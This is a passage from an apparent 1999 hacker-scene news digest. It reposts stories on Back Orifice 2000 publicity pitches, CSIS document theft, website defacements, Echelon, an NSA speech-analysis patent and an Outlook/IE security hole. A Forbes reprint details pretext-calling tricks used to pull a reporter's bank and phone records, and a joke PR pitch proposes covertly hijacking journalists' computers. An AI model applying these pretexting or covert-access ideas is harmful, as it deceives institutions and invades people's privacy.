Tommy Lee. In a revealing display of BO2K's spy attachments, she and her husband will be "caught" fooling around in private by the BO2K spy cam. When they realize they've been caught, she'll look into the camera and say, "$15 buys you the BO2K software, tickets for two to 'Takedown', the upcoming film about hacker Kevin Mitnick, plus friend and family shares in the Cult's upcoming IPO." Lee will then point proudly to the new tag line pinned on her derrière: "You've got B.O.!" I expect that within a month downloads will shatter all previous records. --Marco Greenberg, president of NYPR, New York City White collar control If I were hired to come up with a publicity campaign for Back Orifice 2000, I'd pitch the product as the perfect personal security program for the busy executive. Let's face it: Hackers don't have money; it's the enterprise market where they could reap rewards. You have to tailor a message that strikes a chord with high-powered businesspeople. Relate to their experiences, the fact that they spend much of their time on the road--moving important documents from laptop to desktop and back to laptop. Always looking ahead, they sometimes forget to look behind. I'd make sure they realize that BO2K makes it possible to keep on top of what's happening back at the office--who's in your office, what documents they are reading, what people are saying (You have to love those spy attachments). I'd tell them: As a CEO or CFO, don't you want to know who's reading through your files while you're out raising more venture capital? Wouldn't it be good to now whether anyone was in your office when you weren't there? With BO2K you can find out--and better still for the power-hungry board chairman or CEO--take action. --Lauren Hackett, account supervisor, Middleberg+Associates, New York City Operation anthrax To effectively demonstrate the capabilities of Back Orifice 2000 to journalists, we must have them experience its potential first hand. We recommend a guerilla media campaign on behalf of the Cult Of The Dead Cow, which we propose to call "Operation anthrax." On a to-be-determined date, our agency and "the Cow" would use BO2K to clandestinely take over the computers of 50 targeted journalists, representing both the print and electronic mediums. Simultaneously, BO2K would pirate the surveillance equipment in Federal Reserve Chairman Alan Greenspan's office and feed the captured video and audio information straight to selected reporters' desktops, giving them total unabridged access to the puppeteer of global finance. (We'll call it "The Greenspan Cam.") Cult members could finish up by discussing BO2K's most powerful assets via video to a captive journalism audience. If Operation Anthrax doesn't generate the desired amount of media penetration, fear not. We would be glad to use BO2K to control the presses of the top 100 dailies. And isn't that every publicist's dream? To bypass the journalist completely and place our own story anywhere we want (above the fold, naturally). --Dave Quast, Nicki Gladney and Michael Prichinello of RLM Public Relations, New York City @HWA 17.0 Canada Loses Classified Documents ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles The Canadian Security Intelligence Service has reported the theft of top secret files from the back seat of an agent's car. It is believed that the thieves did not know what they had and just threw the files away. (Hey, lets not forget about physical security.) South China Morning Post http://www.scmp.com/News/World/Article/FullText_asp_ArticleID-19991115030656052.asp Late Update: 1145EST This article has a few more details on the above escapade. The Toronto Star http://www.thestar.ca/thestar/back_issues/ED19991113/news/991113NEW07_NA-SPY13.html South China Morning Post; Monday, November 15, 1999 NORTH AMERICA TODAY Top-secret files stolen from back seat of agent's car MURRAY CAMPBELL in Toronto There are red faces all around at Canada's spy organisation after top-secret documents were stolen from the back seat of an agent's car. In what is being described as the most serious security breach in 20 years, documents outlining the future plans of the Canadian Security Intelligence Service (CSIS) were stolen last month by drug addicts while the agent was watching an ice-hockey game in Toronto. The thieves were apparently looking for money when they saw a briefcase in the car parked outside the arena where the Toronto Maple Leafs play. And a police investigation has concluded that the sensitive documents were later tossed into a rubbish bin and ended up in a landfill site. The CSIS, which was formed in 1984, is responsible for counter-intelligence and counter-terrorism efforts in Canada. The agency, which is charged with guarding the Government's deepest secrets, is extremely embarrassed by the lapse. CSIS officials were trying to play down the importance of the documents, saying they contained no details of intelligence sources or specifics of operations. But an agency official was forced to conclude "we consider the loss of the documents to be a serious matter of national security". It is not the first time the CSIS has slipped up. Earlier this autumn, there were reports that one of its spooks had posted on the Internet the names and pictures of Canadian fighter pilots who served in the Balkans war. In another incident, a computer disc containing the names of targets of CSIS intelligence probes was found by a member of the public. "This is simply a debacle," said Jim Abbott, an MP with the opposition Reform Party. "We look like we are in amateur hour." But even as cartoonists and satirists feasted on the story, there were warnings that Canada's spy agency was now seriously compromised. The country is not a specific target for terrorists but it proximity to the United States and its open access to banking and telecommunications make it attractive to terrorist groups. -=- Toronto Star; http://www.thestar.ca/thestar/back_issues/ED19991113/news/991113NEW07_NA-SPY13.html Spy agencies launch probe after secret document stolen By William Walker Toronto Star Ottawa Bureau Chief OTTAWA - Twin investigations are under way to ensure that no Canadian Security Intelligence Service officer ever leaves confidential documents sitting in a public place, officials say. The probes follow an incident last month outside the Air Canada Centre in Toronto where three smash-and-grab artists, described by police as drug addicts, broke into a car and stole a confidential CSIS operational plan. The first investigation is being conducted internally by CSIS itself, said agency spokesperson Phil Gibson. ``Clearly we don't contemplate employees walking around with these kinds of documents, that's for sure,'' he said in an interview yesterday. The CSIS officer whose car window was smashed isn't being identified by the agency. The person has not been reprimanded yet, but will be dealt with when the CSIS investigation ends soon, Gibson said. The second probe involves the civilian Security Intelligence Review Committee (SIRC), a watchdog agency that includes former Ontario premier Bob Rae among its members. That agency has complete access to CSIS personnel and files for the purpose of its investigation and is expected to make a report public which could lead to changes in how such documents are handled in future. Gibson said the document stolen was an ``annual operational report'' but not the agency's annual report to the solicitor-general. Asked how detailed the information contained within the document was, Gibson said: ``It was broad.'' CSIS has now concluded the document is irretrievable. It is believed the thieves, who were arrested within days, threw a briefcase containing the papers in a dumpster. (See? you NEVER know what you'll find in a dumpster these days, bodies, guns, manuals and secret philez heh... - Ed) @HWA 18.0 Guilty Plea in Media City Defacement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne 18 year old student Edwin Lim Zhaoming pleaded guilty to 17 charges of breaking into the Mediacity, the Television Corporation of Singapore's website. The teen, who renamed the site "Mediashity" last June 15, will be sentenced at a later date. His accomplice, a 15 year old Myanmar national was sentenced to 12 months probation and 100 hours of community service. The Straits Times http://straitstimes.asia1.com.sg/cyb/cyb8_1116.html (404: url not found) @HWA 19.0 Hong Kong's Department of Highways Defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne The web site of Hong Kong's Department of Highways which originally offers bilingual information and guides regarding HK's road system was defaced Friday night. The intruders changed the index page into one with a white background and three lines of quotes from various people. Yahoo News http://au.dailynews.yahoo.com/headlines/151199/nbtech/942645300-3893108747.html Monday 15 November 4:55 PM Hong Kong Highways Department Website Hacked - Update The director of the Hong Kong Highways Department said that repairs to his department's Website, which was defaced by hackers on Friday night, would have to wait until staff arrived for work on Monday morning. The Website at http://www.hyd.gov.hk , normally offers bilingual information on Hong Kong's road system including maps, press releases and other information. But instead of a helping of Hong Kong highway news, visitors to the site found a plain white page with three lines of hacker quotes. When IT Daily contacted Leung on Saturday for comments on the break-in, he said that he was unaware of the incident and since his office was closed, the matter would have to wait until "first thing Monday morning." "The homepage is for general information," said Leung. "If it's down for one or two days, it will not be a big impact on the public." However, the site had been repaired within two hours of Leung's comments. The Highways Department was not the only official body ignoring online vandalism. On Thursday, a hacker broke into the Chinese Ministry of Foreign Affairs Website, at http://fmprc.gov.cn/ , and replaced its home page with several lines of hacker boasts and obscenities. The defaced site was still online over the weekend. A day later, on Friday, a Chinese court jailed a hacker for three years for breaking into the computer system of the Shanghai branch of a Hainan securities company and manipulating prices. The former employee of trust firm Shijiazhuang Trust and Investment, Zhao Zhe, 28, was found guilty of changing stock data so he could profit from two share sales at artificially inflated prices. Meanwhile, officials in Singapore have been taking the issue very seriously. At least two Singapore government Websites were hacked and Web pages altered last week, causing the sites to be taken offline and investigators called in. The Singapore Government Shopfront, at http://shop.gov.sg , was broken into on Friday, and the Ministry of Law's Integrated Land Information Service (INLIS) Web site, at http://www.inlis.gov.sg , was hacked into last Tuesday. Both sites were quickly taken offline for official investigations. Officials said that no records or data were compromised. The Singapore Computer Response Team (SingCERT) is assisting in the investigations and the Police have been notified. "The Ministry of Law takes a serious view of this, as hacking is a serious offense punishable with heavy penalties," said the ministry, in a statement. In September, a fifteen year old Singapore boy was sentenced to a year's probation and 100 hours community service for hacking into the Television Corporation of Singapore's Website, at http://www.tcs.com.sg , earlier this year. Although the attack took place in June, another TCS Website was hacked shortly after, causing government officials to inform the public that they would not hesitate to punish such offences. @HWA 20.0 You Have No Privacy Anyway ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Adam Forbes Magazine hired a private eye to gather all the information he could on one of their reporters. For less than $500 he legally came up with all of the reporters financial information, unlisted phone numbers, social security number, etc... very terrifying. If you have been wondering what all this privacy hype is about then read this. Forbes http://www.forbes.com/Forbes/99/1129/6413182a.htm Our reporter dared a private eye to dig up dirt on him. The results are terrifying to anybody who worries about prying eyes or credit card scamsters. What can you do to protect yourself? The End of Privacy By Adam L. Penenberg THE PHONE RANG AND A STRANGER CRACKED SING-SONGY AT THE OTHER END OF the line: "Happy Birthday." That was spooky--the next day I would turn 37. "Your full name is Adam Landis Penenberg," the caller continued. "Landis?" My mother's maiden name. "I'm touched," he said. Then Daniel Cohn, Web detective, reeled off the rest of my "base identifiers"--my birth date, address in New York, Social Security number. Just two days earlier I had issued Cohn a challenge: Starting with my byline, dig up as much information about me as you can. "That didn't take long," I said. "It took about five minutes," Cohn said, cackling back in Boca Raton, Fla. "I'll have the rest within a week." And the line went dead. In all of six days Dan Cohn and his Web detective agency, Docusearch.com, shattered every notion I had about privacy in this country (or whatever remains of it). Using only a keyboard and the phone, he was able to uncover the innermost details of my life--whom I call late at night; how much money I have in the bank; my salary and rent. He even got my unlisted phone numbers, both of them. Okay, so you've heard it before: America, the country that made "right to privacy" a credo, has lost its privacy to the computer. But it's far worse than you think. Advances in smart data-sifting techniques and the rise of massive databases have conspired to strip you naked. The spread of the Web is the final step. It will make most of the secrets you have more instantly available than ever before, ready to reveal themselves in a few taps on the keyboard. For decades this information rested in remote mainframes that were difficult to access, even for the techies who put it there. The move to desktop PCs and local servers in the 1990s has distributed these data far and wide. Computers now hold half a billion bank accounts, half a billion credit card accounts, hundreds of millions of mortgages and retirement funds and medical claims and more. The Web seamlessly links it all together. As e-commerce grows, marketers and busybodies will crack open a cache of new consumer data more revealing than ever before (see box, p. 188). It will be a salesman's dream--and a paranoid's nightmare. Adding to the paranoia: Hundreds of data sleuths like Dan Cohn of Docusearch have opened up shop on the Web to sell precious pieces of these data. Some are ethical; some aren't. They mine celebrity secrets, spy on business rivals and track down hidden assets, secret lovers and deadbeat dads. They include Strategic Data Service (at datahawk.com) and Infoseekers.com and Dig Dirt Inc. (both at the PI Mall, www.pimall.com). Cohn's firm will get a client your unlisted number for $49, your Social Security number for $49 and your bank balances for $45. Your driving record goes for $35; tracing a cell phone number costs $84. Cohn will even tell someone what stocks, bonds and securities you own (for $209). As with computers, the price of information has plunged. You may well ask: What's the big deal? We consumers are as much to blame as marketers for all these loose data. At every turn we have willingly given up a layer of privacy in exchange for convenience; it is why we use a credit card to shop, enduring a barrage of junk mail. Why should we care if our personal information isn't so personal anymore? Well, take this test: Next time you are at a party, tell a stranger your salary, checking account balance, mortgage payment and Social Security number. If this makes you uneasy, you have your answer. "If the post office said we have to use transparent envelopes, people would go crazy, because the fact is we all have something to hide," says Edward Wade, a privacy advocate who wrote Identity Theft: The Cybercrime of the Millennium (Loompanics Unlimited, 1999) under the pseudonym John Q. Newman. ou can do a few things about it (see box, p. 186). Give your business to the companies that take extra steps to safeguard your data and will guarantee it. Refuse to reveal your Social Security number--the key for decrypting your privacy--to all but the financial institutions required by law to record it. Do something, because many banks, brokerages, credit card issuers and others are lax, even careless, about locking away your records. They take varied steps in trying to protect your privacy (see box, p. 187). Some sell information to other marketers, and many let hundreds of employees access your data. Some workers, aiming to please, blithely hand out your account number, balance and more whenever someone calls and asks for it. That's how Cohn pierced my privacy. "You call up a company and make it seem like you're a spy on a covert mission, and only they can help you,"he says. "It works every time. All day long I deal with spy wannabes." I'm not the paranoid type; I don't see a huddle on TV and think that 11 football players are talking about me. But things have gone too far. A stalker would kill for the wealth of information Cohn was able to dig up. A crook could parlay the data into credit card scams and "identity theft," pilfering my good credit rating and using it to pull more ripoffs. Cohn operates in this netherworld of private eyes, ex-spooks and ex-cops, retired military men, accountants and research librarians. Now 39, he grew up in the Philadelphia suburb of Bryn Mawr, attended Penn State and joined the Navy in 1980 for a three-year stint. In 1987 Cohn formed his own agency to investigate insurance fraud and set up shop in Florida. "There was no shortage of work," he says. He invented a "video periscope" that could rise up through the roof of a van to record a target's scam. In 1995 he founded Docusearch with childhood pal KennethZeiss. They fill up to 100 orders a day on the Web, and expect $1 million in business this year. Their clients include lawyers, insurers, private eyes; the Los Angeles Pension Union is a customer, and Citibank's legal recovery department uses Docusearch to find debtors on the run. Cohn, Zeiss and 13 researchers (6 of them licensed P.I.s) work out of the top floor of a dull, five-story office building in Boca Raton, Fla., sitting in cubicles under a fluorescent glare and taking orders from 9 a.m. to 4 p.m. Their Web site is open 24 hours a day, 365 days a year. You click through it and load up an on-line shopping cart as casually as if you were at Amazon.com. The researchers use sharp sifting methods, but Cohn also admits to misrepresenting who he is and what he is after. He says the law lets licensed investigators use such tricks as "pretext calling," fooling company employees into divulging customer data over the phone (legal in all but a few states). He even claims to have a government source who provides unpublished numbers for a fee, "and you'll never figure out how he is paid because there's no paper trail." Yet Cohn claims to be more scrupulous than rivals. "Unlike an information broker, I won't break the law. I turn down jobs, like if a jealous boyfriend wants to find out where his ex is living." He also says he won't resell the information to anyone else. Let's hope not. Cohn's first step into my digital domain was to plug my name into the credit bureaus--Transunion, Equifax, Experian. In minutes he had my Social Security number, address and birth date.Credit agencies are supposed to ensure that their subscribers (retailers, auto dealers, banks, mortgage companies) have a legitimate need to check credit. "We physically visit applicants to make sure they live up to our service agreement," says David Mooney of Equifax, which keeps records on 200 million Americans and shares them with 114,000 clients. He says resellers of the data must do the same. "It's rare that anyone abuses the system." But Cohn says he gets his data from a reseller, and no one has ever checked up on him. Armed with my credit header, Dan Cohn tapped other sites. A week after my birthday, true to his word, he faxed me a three-page summary of my life. He had pulled up my utility bills, my two unlisted phone numbers and my finances. This gave him the ability to map my routines, if he had chosen to do so: how much cash I burn in a week ( $400), how much I deposit twice a month ( $3,061), my favorite neighborhood bistro (the Flea Market Cafe), the $720 monthly checks I write out to one Judith Pekowsky: my psychotherapist. (When you live in New York, you see a shrink; it's the law.) If I had an incurable disease, Cohn could probably find that out, too. He had my latest phone bill ( $108) and a list of long distance calls made from home--including late-night fiber-optic dalliances (which soon ended) with a woman who traveled a lot. Cohn also divined the phone numbers of a few of my sources, underground computer hackers who aren't wanted by the police--but probably should be. Knowing my Social Security number and other personal details helped Cohn get access to a Federal Reserve database that told him where I had deposits. Cohn found accounts I had forgotten long ago: $503 at Apple Bank for Savings in an account held by a long-ago landlord as a security deposit; $7 in a dormant savings account at Chase Manhattan Bank; $1,000 in another Chase account. A few days later Cohn struck the mother lode. He located my cash management account, opened a few months earlier at Merrill Lynch &Co. That gave him a peek at my balance, direct deposits from work, withdrawals, ATM visits, check numbers with dates and amounts, and the name of my broker. That's too much for some privacy hawks. "If someone can call your bank and get them to release account information without your consent, it means you have no privacy," says Russell Smith, director of Consumer.net in Alexandria, Va., who has won more than $40,000 suing telemarketers for bothering him. "The two issues are knowledge and control: You should know what information about you is out there, and you should be able to control who gets it." How did Cohn get hold of my Merrill Lynch secrets? Directly from the source. Cohn says he phoned Merrill Lynch and talked to one of 500 employees who can tap into my data. "Hi, I'm Dan Cohn, a licensed state investigator conducting an investigation of an Adam Penenberg," he told the staffer, knowing the words "licensed" and "state" make it sound like he works for law enforcement. @HWA 21.0 ACLU to Monitor Echelon ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by turtlex The American Civil Liberties Union in cooperation with the Electronic Privacy Information Center and others has started a program to monitor Echelon. The groups hope to pressure congress for an investigation into the global eavesdropping network. (For something that supposedly doesn't exist - Echelon sure gets a lot of press.) Wired http://www.wired.com/news/politics/0,1283,32586,00.html ACLU http://www.aclu.org EPIC http://www.epic.org Echelon Watch http://www.echelonwatch.org Wired; ACLU to Spy on Echelon by Chris Oakes 3:00 a.m. 17.Nov.1999 PST The American Civil Liberties Union has focused its eye on an international electronic surveillance system that allegedly eyeballs regular citizens. The civil liberties watchdog launched Echelon Watch, a site designed to prompt governmental investigation into the reality -- and the legalities -- of a global electronic surveillance system said to be code-named "Echelon." "This has gone from X Files material to clear reality," said ACLU associate director Barry Steinhardt. "I think at this point it's fact that it exists." The ACLU created and administers the site in conjunction with the Electronic Privacy Information Center and the Omega Foundation of Great Britain, which prepared a report on the issue to the European Parliament. No US intelligence agency has confirmed Echelon, but Steinhardt believes there is sufficient evidence to require a congressional investigation. "I admit that we do not know all the details," Steinhardt said. "But based on these credible reports, it is plainly very large, and very sophisticated." The ACLU bases its position mainly on two reports commissioned by the European Parliament and a letter written by an Australian intelligence official, which confirmed aspects of an Echelon-like operation involving the United Kingdom, the United States, and Australia. According to reports such as those solicited by the European Parliament, Echelon is led by the National Security Agency in the United States, in conjunction with its counterpart agencies in England, Canada, Australia, and New Zealand. Such reports paint a picture of an internationally coordinated surveillance system that intercepts and analyzes global land-based and space-based communications networks, such as the Internet. Monitoring operations run by intelligence agencies worldwide are said to catch everyday telephone, data, cellular, fax, and email transmissions. The transmissions are then purportedly analyzed for suspect activity -- such as terrorism -- and handed off to the appropriate government. -> *By coordinating across national boundaries, governments can monitor each -> *other's traffic and circumvent laws prohibiting governments from spying on -> *their own citizens. Echelon reportedly attempts to capture satellite, microwave, cellular, and fiber-optic communications. The latest in a trickle of what are often merely suggestions of Echelon-like operations is a patent issued by the US Patent and Trademark Office to the US National Security Agency in August for voice-recognition technology. Steinhardt pointed out that the technology is designed to summarize voice communications for further examination. Such technology sounds Echelon-ish -- but then again, it was issued to an intelligence-gathering agency. That's partly why the ACLU wants to see the issue taken beyond disparate reports, theories, and rumors. "Echelon operates inside this black box -- without judicial supervision, without public notice," Steinhardt said. "At this point what the ACLU is asking for is full disclosure of the laws under which Echelon operates -- something the NSA has refused to provide, even to Congress." The report to the European Parliament said that the United Kingdom used the Echelon system to spy on charities, including Amnesty International and Christian Aid. The United States has never officially acknowledged Echelon's existence. When approached to discuss Echelon-related developments, the National Security Agency repeatedly declines comment. Representative Bob Barr (R-Georgia) earlier this year amended intelligence legislation in the House of Representatives to require US intelligence agencies to report on legal standards used in surveillance activities. The legislation -- which targets the National Security Agency, the Central Intelligence Agency, and the Department of Justice -- remains in a House-Senate conference committee awaiting action. Barr is a former CIA official and US attorney who serves on the House Judiciary and Government Reform committees. He has accused the NSA of conducting a "dragnet" of communication and "invading the privacy of American citizens." Documents posted at Echelon Watch include the fax image of a letter sent to an Australian journalist from the Office of the Director of the Australian Defence Signals Directorate (DSD), Martin Brady. The operating rules of the Australian agency "do provide mechanisms to permit DSD to monitor and report foreign communications involving Australians in some special carefully-defined circumstances," the letter said. "DSD does cooperate with counterpart signals intelligence organizations overseas under the UK-USA relationship." In addition to a collection of such documents related to Echelon, the new ACLU site will leverage the group's existing site traffic to encourage public discussion of Echelon's impact on civil liberties. It features links prompting visitors to urge an investigation to Congress. "I think it's beginning to be taken seriously in Washington," Steinhardt said. "It's certainly being taken seriously in other parts of the world. I think the hearings will be the likely next step." @HWA 22.0 NSA Gets Patent on Analyzing Speech ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The National Security Agency has recently been awarded a patent for a system of automatic topic spotting and labeling of data. This could assist the agency in automatically analyzing human speech. The London Independent http://www.independent.co.uk/news/Digital/Features/spies151199.shtml US PTO http://164.195.100.11/netacgi/nph-Parser?Sect1=PTO1&Sect2=HITOFF&d=PALL&p=1&u=/netahtml/srchnum.htm&r=1&f=G&l=50&s1='5,937,422'.WKU.&OS=PN/5,937,422&RS=PN/5,937,422 London Independant; This is just between us (and the spies) The US National Security Agency has patented a new technology for monitoring millions of telephone calls, so watch out, it's now even easier for the spooks to eavesdrop on your conversations By Suelette Dreyfus 15 November 1999 The US National Security Agency has designed and patented a new technology that could aid it in spying on international telephone calls. The NSA patent, granted on 10 August, is for a system of automatic topic spotting and labelling of data. The patent officially confirms for the first time that the NSA has been working on ways of automatically analysing human speech. The NSA's invention is intended automatically to sift through human speech transcripts in any language. The patent document specifically mentions "machine-transcribed speech" as a potential source. Bruce Schneier, author of Applied Cryptography, a textbook on the science of keeping information secret, believes the NSA currently has the ability to use computers to transcribe voice conversations. "One of the holy grails of the NSA is the ability automatically to search through voice traffic. They would have expended considerable effort on this capability, and this indicates it has been fruitful," he said. To date, it has been widely believed that while the NSA has the capability to conduct fully automated, mass electronic eavesdropping on e-mail, faxes and other written communications, it cannot do so on telephone calls. While cautioning that it was difficult to tell how well the ideas in the patent worked in practice, Schneier said the technology could have far-reaching effects on the privacy of international phone calls. "If it works well, the technology makes it possible for the NSA to harvest millions of telephone calls, looking for certain types of conversations," he said. "It's easy to eavesdrop on any single phone call, but sifting through millions of phone calls looking for a particular conversation is difficult," Schneier explained. "In terms of automatic surveillance, text is easier to search than speech. This patent brings the surveillance of speech closer to that of text." The NSA declined to comment on the patent. As a general policy, the agency never comments on its intelligence activities. Yaman Akdeniz, director of Cyber-Rights & Cyber-Liberties UK, warned that with the new patent and a proposed AT&T and BT joint venture, which will allow US law enforcement agencies to tap the new communications network: "We might have a picture in which all British communications are monitored by the NSA." The revelation of the NSA's patent is likely to cause tensions with the European Parliament. Over the past two years, the Parliament has commissioned several reports which examined whether the NSA has been using its electronic ears for commercial espionage, particularly in areas where US corporations compete with European and other companies. The NSA relies on an international web of eavesdropping stations around the world, commonly known as Echelon, to listen into private international communications. The network emerged from a secret agreement signed after the Second World War between five nations including Australia, New Zealand, Canada, Britain and the US. Two of the NSA's most important satellite listening stations are located in Europe, at Menwith Hill in Yorkshire and Bad Aibling in Germany. Julian Assange, a cryptographer who moderates the online Australian discussion forum AUCRYPTO, found the new patent while investigating NSA capabilities. "This patent should worry people. Everyone's overseas phone calls are or may soon be tapped, transcribed and archived in the bowels of an unaccountable foreign spy agency," he said. One of the major barriers to using computers automatically to sift through voice communications on a large scale has been the inability of machines to "think" like humans when analysing the often imperfect computer transcriptions of voice conversations. Commercial software that enables computers to transcribe spoken words into typed text is already on the market, but it usually requires the machine to spend time learning how to understand an individual voice in order to produce relatively error-free text. This makes such software impractical for a spy agency which might want automatically to transcribe and analyse telephone calls on a large scale. It is also difficult for computers to analyse voice conversations because human speech often covers topics that are never actually spoken by name. According to the NSA patent application, "much of the information conveyed in speech is never actually spoken and... utterances are frequently less coherent than written language". US Patent number 5,937,422 reveals that the NSA has designed technology to overcome these barriers in two key ways. First, the patent includes an optional pre-processing step which cleans up text, much of which the agency appears to expect to draw from human conversations. The NSA's "pre-processing" will remove what it calls "stutter phrases" associated with speech based on text. Second, the patent uses a method by which a computer automatically assigns a label, or topic description, to raw data. If the method works well, this system could be far more powerful than traditional keyword searching used on many Internet search engines because it could pull up documents based on their meaning, not just their keywords. Dr Brian Gladman, former MoD director of Strategic Electronic Communications, said that while he doubted the NSA had deployed the patented system yet, the new technology could become a "potent future threat" to privacy. "If the technology does what it says ­ automatically finding and extracting the meaning in messages with reasonable accuracy ­ then it is way ahead of what is being done now," he said. The best way for people to protect their private communications was to use encryption, he said. Encryption software programs scramble data to prevent eavesdropping. "I'm afraid widespread interception is a fact of life and this is what makes encryption so important," he said. "The problem in the UK is that our government is working with the US to prevent UK citizens defending themselves using encryption," he said, referring to the continuing use of export controls to hamper the widespread availability of encryption products. The NSA's current spy technology may be more advanced than methods described in the patent because the application is more than two years old. The US Patent Office approved the patent on 10 August this year, but the NSA originally lodged the application on 15 April 1997. The US Patent office keeps all applications secret until it issues a patent. @HWA 23.0 New Ezine and Web Site - PrivacyPlace Launches ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond An online magazine, with news about privacy issues updated on a daily basis, PrivacyPlace includes opinions, advice, a forum for readers, an archive of articles on privacy, and a marketplace that recommends products and services available for protecting privacy. Future content includes product and book reviews, a developer's corner, and guides to encrypting e-mail and surfing the web anonymously. PrivacyPlace http://www.privacyplace.com Excite News http://news.excite.com/news/bw/991112/ca-lumeria 'PrivacyPlace,' the Online Magazine for Personal Privacy, Launches First Issue; PrivacyPlace.com Offers News, Opinion, Advice, Community and Technology for Protecting Personal Privacy Updated 6:03 AM ET November 12, 1999 BERKELEY, Calif. (BUSINESS WIRE) - PrivacyPlace, a new site designed to offer individuals ways to protect their personal privacy, is now online at www.privacyplace.com. An online magazine, with news about privacy issues updated on a daily basis, PrivacyPlace includes opinions, advice, a forum for readers, an archive of articles on privacy, and a marketplace that recommends products and services available for protecting privacy. Future content includes product and book reviews, a developer's corner, and guides to encrypting e-mail and surfing the web anonymously. PrivacyPlace.com is an effort to give people the tools, the information, and ideas on ways to protect their privacy. PrivacyPlace Editor Tom Maddox is a science fiction writer, screenplay writer (he has written two X Files scripts with coauthor William Gibson), journalist, and essayist. Maddox says PrivacyPlace aims to combine the creativity of a talented team of writers with the power of the Internet to create a publication that is lively, funny, insightful, and ultimately useful for anyone concerned with personal privacy. His credo: "We believe in the power of each of us to fight in our own lives for our privacy and in the social power of concerted action." Regular columnists for PrivacyPlace include Mike Godwin, former legal counsel for the Electronic Frontier Foundation, and Jacques Francoeur, CEO of The Privacy Gateway and expert in international privacy issues. In the first issue, special contributor George Smith, editor of Crypt News and longtime debunker of government myths about cryptography, writes about the Moonlight Maze -- the Russian infowar attack that never was. A regular feature includes the Nosy Parker Award, which is presented to those who have egregiously trampled on personal privacy, and a regular column from an anonymous character known as Paranoid Paul, who issues a report from the road. The Marketplace offers privacy-related software programs users can purchase for immediate download. There's also an ever-growing library of past articles on privacy, indexed by subject, and a Forum, where readers can talk with each other, with writers at PrivacyPlace, and with the editors. PrivacyPlace is owned and operated by Lumeria Inc, an infomediary incubator. Lumeria was founded in 1997 by former computer journalist and industry analyst Fred Davis to provide technology solutions for the personal management of information and knowledge. Fred Davis is also the Editor-in-Chief of PrivacyPlace. The publisher of PrivacyPlace is Colette McMullen, who also serves as Lumeria's VP of Sales and Marketing. Before joining Lumeria, McMullen was Group Publisher of IDG's Web Publishing group -- which includes Sun World, Java World, and Linux World -- where she cofounded the first profitable online publication. Contact: PrivacyPlace Tom Maddox, 510/981-2215 editor@privacyplace.com or Berkeley Ventures, Inc. Sylvia Paull, 510/526-5555 sylvia@weblust.com 24.0 Vendor Response Archive ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by erik Dragonmount Networks, in hoping to expose vendors who put security on the back burner, and to salute those who make it a priority, has launched the Vendor Response Archive. The Vendor Response Archive hopes to pressure software vendors to take security seriously. If a vendor responds poorly to a problem, users should know. Likewise, if a vendor responds quickly and honestly, the vendor should be commended. Dragonmount Networks http://www.dragonmount.net/security/vra/index.htm @HWA 25.0 Another from Cuartango: More Microsoft Security Holes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne Called the "Active Server Setup Security Loophole", this glitch in Microsoft Outlook and Outlook Express can download an e-mail attachment without the users knowledge. The attachment has the capability to access and delete files at will. MSNBC http://www.msnbc.com/news/335418.asp MS bug opens door to your hard drive Outlook, Outlook Express save temporary copy of file to disk when you open attachment By Bradley F. Shimmin BUGNET Nov. 15 — Forget for now about the BubbleBoy Virus, which has yet to cause anyone harm. There’s a real vulnerability lurking in Microsoft Outlook and Outlook Express capable of delivering your machine into malevolent hands. DISCOVERED BY JUAN CARLOS GARCIA CUARTANGO, the “Active Setup Control Security Loophole” can download and save an e-mail-borne attachment without your intervention or knowledge. Once free to roam your hard drive, the attachment can access or delete files at will. (Note: Microsoft is a partner in MSNBC.) What makes this vulnerability particularly scary is its stealth. A hostile hacker could create an HTML e-mail message attachment that masquerades as an innocuous Cabinet (CAB) file. This is the file format Microsoft uses to transport and store application code such as software updates. The trick is that you don’t need to save such a deceitful file to disk. By simply opening the attachment, both e-mail applications save a temporary copy to disk. Code embedded in the e-mail message can then execute this copy. A malicious user could embed an unsafe executable and disguise it as a safe attachment, so users following normal security standards could think they are safe,” explained Lisa Gurry, a Microsoft product manager for Office. “The danger is someone could exploit it and create a CAB that could do who knows what.” Concerned users can quickly disable Active Scripting in Outlook 2000 or Outlook Express as a temporary workaround. This will prevent any embedded code from executing a malicious CAB file that has already been written to disk. Another workaround is to simply save attachments to disk before opening them. The unfriendly code in an e-mail message must execute when the file attachment is opened in order to find out where the temporary file has been created. To fully quash this bug, Microsoft recommends a software patch, which the company has made available from its Security Advisor site. But it’s not for Outlook or Outlook Express. “The vulnerability is in Internet Explorer,” said Gurry. “It is an ActiveX control that ships as a part of Explorer 4 and 5, yet Outlook and Outlook Express users are affected by it.” Microsoft's Active Setup Control Patch The patch fixes a fault within the Active Setup ActiveX control found within IE version 4.01 and above running on both Intel and Alpha machines. It replaces a file called INSENG.DLL with a file of the same name dated 10/26/1999. The new file requires that all CAB file attachments (real or pretend) contain a valid digital signature. Of course, a knave could still send a hostile attachment, but the file’s signature would create a traceable fingerprint. However, the patch only works on versions 4.01 running Service Pack 2. If you’re running IE 4.01 with Service Pack 1 (or any earlier version of IE), Microsoft recommends that you simply upgrade to a newer version before applying the patch. @HWA 26.0 DOD helps Local Cops in Fighting CyberCrime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond While the Department of Defense may be prohibited from conducting local law enforcement they can advise or assist local police agencies in other ways such as grants, access to support services or systems, and transfers of equipment or other assets. The GAO has released a report detailing crime technology assistance from DOD to local law enforcement agencies. GAO http://www.gao.gov/daybook/991115.htm (Links to pdf files) 27.0 BSA Busts IRC Pirates 